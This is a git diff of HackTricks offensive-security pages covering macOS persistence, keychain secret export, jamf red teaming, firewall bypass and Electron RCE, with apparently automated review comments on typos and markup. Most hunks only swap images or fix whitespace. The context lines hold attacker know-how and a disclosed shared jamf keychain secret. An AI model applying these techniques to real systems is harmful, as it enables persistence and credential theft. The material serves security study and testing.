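Review bot: The lines changed from `###` to `####` here are not headings: they sit between `%%%bash` and `%%%`, which is a broken code fence, and they are the shell comments of that script. Demoting them keeps the breakage and the page will still render five headings inside a list item, with several commands run together on one line and Markdown escapes left in the `sed` expression and the `host\_path` variable. Restore a proper fenced `bash` block with `#` comments rather than adjusting heading levels.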
@@ -187,7 +187,7 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
* [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
* [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
-
+
{% embed url="https://websec.nl/" %}
diff --git a/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md b/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md
index 602a4e7f0..af3fbfc57 100644
--- a/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md
+++ b/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md
@@ -77,7 +77,7 @@ This is useful in containers because **shutting down the process and starting a
To connect to a **Chromium-based browser**, the `chrome://inspect` or `edge://inspect` URLs can be accessed for Chrome or Edge, respectively. By clicking the Configure button, it should be ensured that the **target host and port** are correctly listed. The image shows a Remote Code Execution (RCE) example:
-![](<../../.gitbook/assets/image (671).png>)
+![](<../../.gitbook/assets/image (674).png>)
Using the **command line** you can connect to a debugger/inspector with:
diff --git a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
index a35a0bde1..74e0cc6bd 100644
--- a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
+++ b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
@@ -217,11 +217,11 @@ cat /sys/class/graphics/fb0/virtual_size
To **open** the **raw image** you can use **GIMP**, select the \*\*`screen.raw` \*\* file and select as file type **Raw image data**:
-![](<../../../.gitbook/assets/image (460).png>)
+![](<../../../.gitbook/assets/image (463).png>)
Then modify the Width and Height to the ones used on the screen and check different Image Types (and select the one that shows better the screen):
-![](<../../../.gitbook/assets/image (314).png>)
+![](<../../../.gitbook/assets/image (317).png>)
## Root Group
diff --git a/linux-hardening/useful-linux-commands.md b/linux-hardening/useful-linux-commands.md
index 9e6cd7b60..f249a3eac 100644
--- a/linux-hardening/useful-linux-commands.md
+++ b/linux-hardening/useful-linux-commands.md
@@ -1,6 +1,6 @@
# Useful Linux Commands
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -143,7 +143,7 @@ sudo chattr -i file.txt #Remove the bit so you can delete it
7z l file.zip
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -349,7 +349,7 @@ Other ways to support HackTricks:
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/macos-hardening/macos-auto-start-locations.md b/macos-hardening/macos-auto-start-locations.md
index b0551360d..2736d212c 100644
--- a/macos-hardening/macos-auto-start-locations.md
+++ b/macos-hardening/macos-auto-start-locations.md
@@ -202,7 +202,7 @@ In **`~/Library/Preferences`** are store the preferences of the user in the Appl
For example, the Terminal can execute a command in the Startup:
-
+
This config is reflected in the file **`~/Library/Preferences/com.apple.Terminal.plist`** like this:
@@ -494,7 +494,7 @@ The iTerm2 preferences located in **`~/Library/Preferences/com.googlecode.iterm2
This setting can be configured in the iTerm2 settings:
-
+
And the command is reflected in the preferences:
@@ -863,7 +863,7 @@ mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"
Then, open the `Folder Actions Setup` app, select the **folder you would like to watch** and select in your case **`folder.scpt`** (in my case I called it output2.scp):
-
+
Now, if you open that folder with **Finder**, your script will be executed.
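Review bot: in the context line above the image, the author's script is named `output2.scp`, while every other reference in this section uses the `.scpt` extension (`folder.scpt`, `/tmp/folder.scpt`). This looks like a truncated extension. Since the hunk touches this paragraph, correct it to `output2.scpt`, or drop the aside, so readers do not go looking for a `.scp` file.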
@@ -875,7 +875,7 @@ Now, lets try to prepare this persistence without GUI access:
* `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp`
2. **Remove** the Folder Actions you just set:
-
+
Now that we have an empty environment
@@ -1049,7 +1049,7 @@ Writeup: [https://posts.specterops.io/saving-your-access-d562bf5bf90b](https://p
* `~/Library/Screen Savers`
* **Trigger**: Select the screen saver
-
+
#### Description & Exploit
diff --git a/macos-hardening/macos-red-teaming/README.md b/macos-hardening/macos-red-teaming/README.md
index 5054102cf..b5e647807 100644
--- a/macos-hardening/macos-red-teaming/README.md
+++ b/macos-hardening/macos-red-teaming/README.md
@@ -51,11 +51,11 @@ You could use the script [**JamfSniper.py**](https://github.com/WithSecureLabs/J
Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form:
-![](<../../.gitbook/assets/image (104).png>)
+![](<../../.gitbook/assets/image (107).png>)
#### JAMF device Authentication
-
+
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
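Review bot: the last context line calls the jamf persistence a **LaunchDaemon** but gives a path under `/Library/LaunchAgents/`. Daemons and agents are different launchd domains with different privileges and session requirements, so one of the two is wrong. Confirm where the plist actually lives and make the term and the path agree, because anyone auditing persistence will check the directory named here. While there, "jamf **persist**" should read "persists".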
@@ -102,7 +102,7 @@ With this information, **create a VM** with the **stolen** Hardware **UUID** and
#### Secrets stealing
-
+
You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**.
@@ -211,7 +211,7 @@ MacOS Red Teaming is different from a regular Windows Red Teaming as usually **M
When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed:
-
+
## References
diff --git a/macos-hardening/macos-red-teaming/macos-keychain.md b/macos-hardening/macos-red-teaming/macos-keychain.md
index bc8071679..fff6196eb 100644
--- a/macos-hardening/macos-red-teaming/macos-keychain.md
+++ b/macos-hardening/macos-red-teaming/macos-keychain.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
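Review bot: on the changed Twitter line, the visible handle is `@carlospolopm` but the link target is `twitter.com/hacktricks\_live`. The edit only adds the backslash escape and leaves that mismatch in place. Make the link text and the destination name the same account. The same line is changed in the `@@ -169,7 +169,7 @@` hunk of this file and needs the same fix.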
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## Main Keychains
@@ -49,7 +49,7 @@ Each entry in the keychain is governed by **Access Control Lists (ACLs)** which
The ACLs are further accompanied by a **list of trusted applications** that can perform these actions without prompting. This could be:
-* **N`il`** (no authorization required, **everyone is trusted**)
+* **N`il`** (no authorization required, **everyone is trusted**)
* An **empty** list (**nobody** is trusted)
* **List** of specific **applications**.
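Review bot: the changed bullet is marked up as `**N`il`**`, which renders a bold "N" followed by "il" in code style. The edit only changes trailing whitespace and keeps the broken markup. Put the whole value in one code span (`Nil`) so it reads as the literal ACL value it describes.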
@@ -109,7 +109,7 @@ List and get **info** about each keychain entry:
Get **ACLs** of each entry:
-* With the API **`SecAccessCopyACLList`** you can get the **ACL for the keychain item**, and it will return a list of ACLs (like `ACLAuhtorizationExportClear` and the others previously mentioned) where each list has:
+* With the API **`SecAccessCopyACLList`** you can get the **ACL for the keychain item**, and it will return a list of ACLs (like `ACLAuhtorizationExportClear` and the others previously mentioned) where each list has:
* Description
* **Trusted Application List**. This could be:
* An app: /Applications/Slack.app
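Review bot: the changed line spells the authorization constant `ACLAuhtorizationExportClear` (letters transposed in "Authorization"). The edit is whitespace-only and carries the typo forward. Fix it to `ACLAuthorizationExportClear`, and check that it matches the spelling used where the authorizations are first listed, since readers will search headers and logs for this exact string.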
@@ -119,7 +119,7 @@ Get **ACLs** of each entry:
Export the data:
* The API **`SecKeychainItemCopyContent`** gets the plaintext
-* The API **`SecItemExport`** exports the keys and certificates but might have to set passwords to export the content encrypted
+* The API **`SecItemExport`** exports the keys and certificates but might have to set passwords to export the content encrypted
And these are the **requirements** to be able to **export a secret without a prompt**:
@@ -150,7 +150,7 @@ If **apple** is indicated in the **partitionID**, you could access it with **`os
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -169,7 +169,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/macos-hardening/macos-red-teaming/macos-mdm/README.md b/macos-hardening/macos-red-teaming/macos-mdm/README.md
index 4bc59914f..af81d9ef6 100644
--- a/macos-hardening/macos-red-teaming/macos-mdm/README.md
+++ b/macos-hardening/macos-red-teaming/macos-mdm/README.md
@@ -104,7 +104,7 @@ Apple devices manufactured after 2010 generally have **12-character alphanumeric
6. Profile installation (Device) a. incl. MDM, SCEP and root CA payloads
7. MDM command issuance (Device)
-![](<../../../.gitbook/assets/image (691).png>)
+![](<../../../.gitbook/assets/image (694).png>)
The file `/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Library/PrivateFrameworks/ConfigurationProfiles.framework/ConfigurationProfiles.tbd` exports functions that can be considered **high-level "steps"** of the enrolment process.
@@ -112,7 +112,7 @@ The file `/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Librar
This part of the process occurs when a **user boots a Mac for the first time** (or after a complete wipe)
-![](<../../../.gitbook/assets/image (1041).png>)
+![](<../../../.gitbook/assets/image (1044).png>)
or when executing `sudo profiles show -type enrollment`
@@ -146,7 +146,7 @@ The response is a JSON dictionary with some important data like:
### **Step 5: Profile Retrieval**
-![](<../../../.gitbook/assets/image (441).png>)
+![](<../../../.gitbook/assets/image (444).png>)
* Request sent to **url provided in DEP profile**.
* **Anchor certificates** are used to **evaluate trust** if provided.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md
index d98c442f8..f939e8aa1 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@@ -140,7 +140,7 @@ Of course from a red teams perspective you should be also interested in escalati
* [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)
* [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY)
-
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md
index 1c95b7ae6..112ac4c4b 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md
@@ -99,7 +99,7 @@ ioreg -p #Check other plane
You could download **`IORegistryExplorer`** from **Xcode Additional Tools** from [**https://developer.apple.com/download/all/**](https://developer.apple.com/download/all/) and inspect the **macOS IORegistry** through a **graphical** interface.
-
+
In IORegistryExplorer, "planes" are used to organize and display the relationships between different objects in the IORegistry. Each plane represents a specific type of relationship or a particular view of the system's hardware and driver configuration. Here are some of the common planes you might encounter in IORegistryExplorer:
@@ -181,9 +181,9 @@ You could obtain these for example from a [**firmware image (ipsw)**](./#ipsw).
You could start decompiling the **`externalMethod`** function as this is the driver function that will be receiving the call and calling the correct function:
-
+
-
+
That awful call demagled means:
@@ -211,35 +211,35 @@ IOUserClient2022::dispatchExternalMethod(uint32_t selector, IOExternalMethodArgu
With this info you can rewrite Ctrl+Right -> `Edit function signature` and set the known types:
-
+
The new decompiled code will look like:
-
+
For the next step we need to have defined the **`IOExternalMethodDispatch2022`** struct. It's opensource in [https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176), you could define it:
-
+
Now, following the `(IOExternalMethodDispatch2022 *)&sIOExternalMethodArray` you can see a lot of data:
-
+
Change the Data Type to **`IOExternalMethodDispatch2022:`**
-
+
after the change:
-
+
And as we now in there we have an **array of 7 elements** (check the final decompiled code), click to create an array of 7 elements:
-
+
After the array is created you can see all the exported functions:
-
+
{% hint style="success" %}
If you remember, to **call** an **exported** function from user space we don't need to call the name of the function, but the **selector number**. Here you can see that the selector **0** is the function **`initializeDecoder`**, the selector **1** is **`startDecoder`**, the selector **2** **`initializeEncoder`**...
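Review bot: two wording problems sit in the context lines between the image swaps. "Change the Data Type to **`IOExternalMethodDispatch2022:`**" has the colon inside the code span, so the type name reads as if it ends in `:`. Move the colon outside the backticks. "And as we now in there we have an **array of 7 elements**" should read "as we know". The paragraph just before this hunk also has "demagled" for "demangled".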
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
index b18e17a04..2e7ec3dfc 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
@@ -22,7 +22,7 @@ Obviously, this is so powerful that it is **complicated to load a kernel extensi
* When **entering recovery mode**, kernel **extensions must be allowed** to be loaded:
-
+
* The kernel extension must be **signed with a kernel code signing certificate**, which can only be **granted by Apple**. Who will review in detail the company and the reasons why it is needed.
* The kernel extension must also be **notarized**, Apple will be able to check it for malware.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
index 76129457e..63023ebc2 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
@@ -18,7 +18,7 @@ Other ways to support HackTricks:
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
-
+
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
@@ -58,7 +58,7 @@ The events that the Endpoint Security framework can monitor are categorized into
### Endpoint Security Framework Architecture
-
+
**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller:
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
index b59b98a9a..3bb57a506 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## Static Analysis
@@ -143,7 +143,7 @@ Note that this names could be obfuscated to make the reversing of the binary mor
When a function is called in a binary that uses objective-C, the compiled code instead of calling that function, it will call **`objc_msgSend`**. Which will be calling the final function:
-![](<../../../.gitbook/assets/image (302).png>)
+![](<../../../.gitbook/assets/image (305).png>)
The params this function expects are:
@@ -231,11 +231,11 @@ In the left panel of hopper it's possible to see the symbols (**Labels**) of the
In the middle panel you can see the **dissasembled code**. And you can see it a **raw** disassemble, as **graph**, as **decompiled** and as **binary** by clicking on the respective icon:
-
+
Right clicking in a code object you can see **references to/from that object** or even change its name (this doesn't work in decompiled pseudocode):
-
+
Moreover, in the **middle down you can write python commands**.
@@ -348,7 +348,7 @@ ktrace trace -s -S -t c -c ls | grep "ls("
[**SpriteTree**](https://themittenmac.com/tools/) is a tool to prints the relations between processes.\
You need to monitor your mac with a command like **`sudo eslogger fork exec rename create > cap.json`** (the terminal launching this required FDA). And then you can load the json in this tool to viwe all the relations:
-
+
### FileMonitor
@@ -362,7 +362,7 @@ You need to monitor your mac with a command like **`sudo eslogger fork exec rena
[**Apple Instruments**](https://developer.apple.com/library/archive/documentation/Performance/Conceptual/CellularBestPractices/Appendix/Appendix.html) are part of Xcode’s Developer tools – used for monitoring application performance, identifying memory leaks and tracking filesystem activity.
-![](<../../../.gitbook/assets/image (1135).png>)
+![](<../../../.gitbook/assets/image (1138).png>)
### fs\_usage
@@ -554,10 +554,9 @@ litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash
* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
* [**The Art of Mac Malware: The Guide to Analyzing Malicious Software**](https://taomm.org/)
-
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
index 14fe59d3d..d2d381900 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
@@ -77,7 +77,7 @@ They are often used to store the **base address of the thread-local storage** re
**PSTATE** contains several process components serialized into the operating-system-visible **`SPSR_ELx`** special register, being X the **permission** **level of the triggered** exception (this allows to recover the process state when the exception ends).\
These are the accessible fields:
-
+
* The **`N`**, **`Z`**, **`C`** and **`V`** condition flags:
* **`N`** means the operation yielded a negative result
@@ -121,7 +121,7 @@ ARM64 instructions generally have the **format `opcode dst, src1, src2`**, where
* Example: `ldr x0, [x1]` — This loads a value from the memory location pointed to by `x1` into `x0`.
* **Offset mode**: An offset affecting the orin pointer is indicated, for example:
* `ldr x2, [x1, #8]`, this will load in x2 the value from x1 + 8
- * `ldr x2, [x0, x1, lsl #2]`, this will load in x2 an object from the array x0, from the position x1 (index) \* 4
+ * `ldr x2, [x0, x1, lsl #2]`, this will load in x2 an object from the array x0, from the position x1 (index) \* 4
* **Pre-indexed mode**: This will apply calculations to the origin, get the result and also store the new origin in the origin.
* `ldr x2, [x1, #8]!`, this will load `x1 + 8` in `x2` and store in x1 the result of `x1 + 8`
* `str lr, [sp, #-4]!`, Store the link register in sp and update the register sp
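Review bot: the pre-indexed example in the context says `ldr x2, [x1, #8]!` "will load `x1 + 8` in `x2`". That reads as loading the address itself, not the memory contents at that address. Reword it along the lines of "loads the value at address `x1 + 8` into `x2`, then writes `x1 + 8` back to `x1`". The `str lr, [sp, #-4]!` bullet has the same looseness ("Store the link register in sp"). Also "orin pointer" in the offset-mode bullet should be "origin pointer".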
@@ -189,12 +189,12 @@ ARM64 instructions generally have the **format `opcode dst, src1, src2`**, where
* Example: `tst X1, #7` Check if any of the last 3 bits of X1 is 1
* **`teq`**: XOR operation discarding the result
* **`b`**: Unconditional Branch
- * Example: `b myFunction`
+ * Example: `b myFunction`
* Note that this won't fill the link register with the return address (not suitable for subrutine calls that needs to return back)
* **`bl`**: **Branch** with link, used to **call** a **subroutine**. Stores the **return address in `x30`**.
* Example: `bl myFunction` — This calls the function `myFunction` and stores the return address in `x30`.
* Note that this won't fill the link register with the return address (not suitable for subrutine calls that needs to return back)
-* **`blr`**: **Branch** with Link to Register, used to **call** a **subroutine** where the target is **specified** in a **register**. Stores the return address in `x30`. (This is
+* **`blr`**: **Branch** with Link to Register, used to **call** a **subroutine** where the target is **specified** in a **register**. Stores the return address in `x30`. (This is
* Example: `blr x1` — This calls the function whose address is contained in `x1` and stores the return address in `x30`.
* **`ret`**: **Return** from **subroutine**, typically using the address in **`x30`**.
* Example: `ret` — This returns from the current subroutine using the return address in `x30`.
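Review bot: the changed `blr` line still ends in an unfinished parenthesis, "(This is". The edit only strips whitespace and leaves the sentence cut off. Either complete the sentence or delete the fragment. In the same hunk, the note under `bl` ("this won't fill the link register with the return address") is a copy of the note under `b` and contradicts the `bl` description two lines above, which says it stores the return address in `x30`. Remove it from the `bl` entry.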
@@ -301,7 +301,7 @@ This is done by **saving the processor state from the `CPSR` to the `SPSR`** of
In AArch32 the CPSR works similar to **`PSTATE`** in AArch64 and is also stored in **`SPSR_ELx`** when a exception is taken to restore later the execution:
-
+
The fields are divided in some groups:
@@ -325,7 +325,7 @@ The fields are divided in some groups:
* **`E`** bit: Indicates the **endianness**.
* **Mode and Exception Mask Bits** (0-4): They determine the current execution state. The **5th** one indicates if the program runs as 32bit (a 1) or 64bit (a 0). The other 4 represents the **exception mode currently in used** (when a exception occurs and it's being handled). The number set **indicates the current priority** in case another exception is triggered while this is being handled.
-
+
* **`AIF`**: Certain exceptions can be disabled using the bits **`A`**, `I`, `F`. If **`A`** is 1 it means **asynchronous aborts** will be triggered. The **`I`** configures to respond to external hardware **Interrupts Requests** (IRQs). and the F is related to **Fast Interrupt Requests** (FIRs).
@@ -394,6 +394,10 @@ whoami
)
```
+{% hint style="success" %}
+Setting the env variable `NSObjCMessageLoggingEnabled=1` it's possible to log when this function is called in a file like `/tmp/msgSends-pid`.
+{% endhint %}
+
### Shellcodes
To compile:
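Review bot: the added hint refers to "this function" without naming it, and the surrounding context shows only the end of a code block, so the reader cannot tell which call gets logged. The variable name and the `msgSends` file name suggest `objc_msgSend`, so name it explicitly. Also say that `pid` in `/tmp/msgSends-pid` stands for the process ID, for example by writing `/tmp/msgSends-<pid>`. The opening "Setting the env variable ... it's possible to" would read better as "By setting ... it is possible to".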
@@ -424,7 +428,6 @@ for s in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ;
done
```
-
C code to test the shellcode
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md b/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
index 03cf5d240..4ed31f851 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md
@@ -50,7 +50,7 @@ lsof -i TCP -sTCP:ESTABLISHED
DNS resolutions are done via **`mdnsreponder`** signed application which will probably vi allowed to contact DNS servers.
-
+
### Via Browser apps
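Review bot: the first context line names the resolver as `mdnsreponder` and then says it "will probably vi allowed". The daemon is `mDNSResponder`, and "vi" looks like a typo for "be". Both matter here because the sentence tells the reader which signed process a firewall rule is likely to permit. Fix them while this paragraph is being touched.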
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
index db97cc63e..76247d0de 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
@@ -112,7 +112,7 @@ dyldex_all [dyld_shared_cache_path] # Extract all
Note that even if `dyld_shared_cache_util` tool doesn't work, you can pass the **shared dyld binary to Hopper** and Hopper will be able to identify all the libraries and let you **select which one** you want to investigate:
{% endhint %}
-
+
Some extractors won't work as dylibs are prelinked with hard coded addresses in therefore they might be jumping to unknown addresses
@@ -257,6 +257,8 @@ Mac OS binaries usually are compiled as **universal binaries**. A **universal bi
[universal-binaries-and-mach-o-format.md](universal-binaries-and-mach-o-format.md)
{% endcontent-ref %}
+## macOS Process Memory
+
## macOS memory dumping
{% content-ref url="macos-memory-dumping.md" %}
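Review bot: the added `## macOS Process Memory` heading has no body and is followed directly by `## macOS memory dumping`, so it renders as an empty section. Either add the intended text or `content-ref` under it in this change, or leave the heading out until the page it points to exists.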
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
index f6b873a76..c3ff466dc 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
@@ -58,7 +58,7 @@ Note that **`.dmg`** installers support **so many formats** that in the past som
### Hierarchy
-
+
The hierarchy of a DMG file can be different based on the content. However, for application DMGs, it usually follows this structure:
@@ -102,7 +102,7 @@ It's possible to just generate a **`.pkg`** file with **pre and post-install scr
It's possible to add **`
```
-
+
## RCE: preload
@@ -238,9 +238,9 @@ These listeners are **overridden by the desktop application** to implement its o
**Here is a simplified pseudocode:**
-![https://miro.medium.com/max/1400/1\*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (258).png>)
+![https://miro.medium.com/max/1400/1\*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (261).png>)
-![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (960).png>)
+![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (963).png>)
Electron JS security best practices advise against accepting untrusted content with the `openExternal` function, as it could lead to RCE through various protocols. Operating systems support different protocols that might trigger RCE. For detailed examples and further explanation on this topic, one can refer to [this resource](https://positive.security/blog/url-open-rce#windows-10-19042), which includes Windows protocol examples capable of exploiting this vulnerability.
@@ -351,7 +351,7 @@ npm start
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
index 9397b47d4..a2fa02c9c 100644
--- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
+++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
@@ -29,17 +29,17 @@ process.on('exit', function (){
